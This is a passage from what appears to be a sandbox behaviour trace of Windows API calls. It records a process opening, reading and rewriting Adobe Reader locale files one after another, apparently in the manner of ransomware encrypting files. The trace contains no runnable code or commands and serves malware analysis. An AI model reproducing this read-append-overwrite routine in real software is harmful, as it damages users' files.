lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.654] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0081.654] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.654] CloseHandle (hObject=0x1cc) returned 1 [0081.654] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\AdobeCollabSync.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\adobecollabsync.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0081.655] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.655] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1a00 [0081.655] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.655] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.655] ReleaseMutex (hMutex=0x168) returned 1 [0081.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.TUR", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0081.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.TUR", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.TUR", lpUsedDefaultChar=0x0) returned 19 [0081.655] ReadFile (in: hFile=0x1cc, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x2b1f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0081.662] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0081.662] WriteFile (in: hFile=0x1cc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0081.662] CloseHandle (hObject=0x1cc) returned 1 [0081.662] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\IA32.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\ia32.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.670] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.670] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe00 [0081.670] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.671] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.671] ReleaseMutex (hMutex=0x168) returned 1 [0081.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.TUR", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0081.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.TUR", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.TUR", lpUsedDefaultChar=0x0) returned 8 [0081.671] ReadFile (in: hFile=0x1e4, lpBuffer=0x2665868, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2b1f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0081.687] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0081.687] WriteFile (in: hFile=0x1e4, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0081.687] CloseHandle (hObject=0x1e4) returned 1 [0081.688] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\SaveAsRTF.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\saveasrtf.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.698] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.698] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4600 [0081.698] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.698] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.698] ReleaseMutex (hMutex=0x168) returned 1 [0081.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.TUR", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.TUR", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.TUR", lpUsedDefaultChar=0x0) returned 13 [0081.698] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.709] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3600 [0081.709] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.994] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3600 [0081.995] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.995] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0081.995] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.995] CloseHandle (hObject=0x1e4) returned 1 [0081.995] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Accessibility.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\accessibility.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.996] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.996] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb000 [0081.996] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.996] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.996] ReleaseMutex (hMutex=0x168) returned 1 [0081.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.UKR", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0081.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.UKR", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Accessibility.UKR", lpUsedDefaultChar=0x0) returned 17 [0081.997] ReadFile (in: hFile=0x1e4, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.998] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa000 [0081.998] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.999] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa000 [0081.999] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.000] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0082.000] WriteFile (in: hFile=0x1e4, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.000] CloseHandle (hObject=0x1e4) returned 1 [0082.000] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\eBook.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\ebook.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.001] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.001] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1a00 [0082.001] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.001] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.001] ReleaseMutex (hMutex=0x168) returned 1 [0082.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.UKR", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0082.001] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.UKR", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.UKR", lpUsedDefaultChar=0x0) returned 9 [0082.001] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2b1f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0082.011] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0082.011] WriteFile (in: hFile=0x1e4, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0082.012] CloseHandle (hObject=0x1e4) returned 1 [0082.012] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\ReadOutLoud.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\readoutloud.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.012] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.012] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2c00 [0082.013] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.013] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.013] ReleaseMutex (hMutex=0x168) returned 1 [0082.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.UKR", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0082.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.UKR", cchWideChar=15, lpMultiByteStr=0x1f735ac, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.UKR", lpUsedDefaultChar=0x0) returned 15 [0082.013] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.046] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1c00 [0082.046] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.072] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1c00 [0082.072] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.073] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0082.073] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.073] CloseHandle (hObject=0x1e4) returned 1 [0082.073] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Updater.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\updater.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.075] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.075] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2800 [0082.075] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.075] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.075] ReleaseMutex (hMutex=0x168) returned 1 [0082.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.UKR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0082.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Updater.UKR", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Updater.UKR", lpUsedDefaultChar=0x0) returned 11 [0082.075] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.108] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1800 [0082.109] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.121] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1800 [0082.121] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.121] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0082.121] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.122] CloseHandle (hObject=0x1e4) returned 1 [0082.122] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\DigSig.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\digsig.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0082.130] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.130] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x11e00 [0082.130] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.131] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.131] ReleaseMutex (hMutex=0x168) returned 1 [0082.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.CHS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.CHS", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.CHS", lpUsedDefaultChar=0x0) returned 10 [0082.131] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0082.137] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x10e00 [0082.137] ReadFile (in: hFile=0x1d8, lpBuffer=0x2696e18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2696e18*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.146] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x10e00 [0082.147] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.148] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0082.148] WriteFile (in: hFile=0x1d8, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.149] CloseHandle (hObject=0x1d8) returned 1 [0082.149] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\PPKLITE.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\ppklite.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0082.149] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.150] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: 